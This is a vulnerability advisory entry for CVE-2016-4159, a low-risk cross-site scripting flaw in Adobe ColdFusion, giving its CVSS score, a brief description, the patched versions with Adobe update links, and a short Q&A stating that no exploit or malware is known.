Vulnerability identifier: #VU5

Vulnerability risk: Low

CVSSv3.1: 5.3 [AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2016-4159

CWE-ID: CWE-79

Exploitation vector: Network

Exploit availability: No

Description

A cross-site scripting vulnerability was reported in ColdFusion.

The vulnerability exists due to insufficient sanitization of input data. A remote attacker can send a specially crafted HTTP request to the vulnerable application and execute arbitrary HTML and script code in user’s browser in security context of vulnerable website.

Exploitation of this vulnerability may allow an attacker to obtain sensitive to the victim information, such as cookies, or disguise website content.

Mitigation

The vulnerability is fixed in the following versions of ColdFusion:

• ColdFusion (2016 release) Update 2
• ColdFusion 11 Update 9
• ColdFusion 10 Update 20

Adobe recommends ColdFusion customers update their installation using the instructions provided in the relevant technote:

• ColdFusion (2016 release): http://helpx.adobe.com/coldfusion/kb/coldfusion-2016-update-2.html
• ColdFusion 11: http://helpx.adobe.com/coldfusion/kb/coldfusion-11-update-9.html
• ColdFusion 10: http://helpx.adobe.com/coldfusion/kb/coldfusion-10-update-20.html

Customers should also apply the security configuration settings as outlined on the ColdFusion Security page as well as review the respective Lockdown guide.

• ColdFusion (2016 release) Lockdown guide
• ColdFusion 11 Lockdown Guide 
• ColdFusion 10 Lockdown Guide.
  

External links
http://helpx.adobe.com/security/products/coldfusion/apsb16-22.html

---

Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.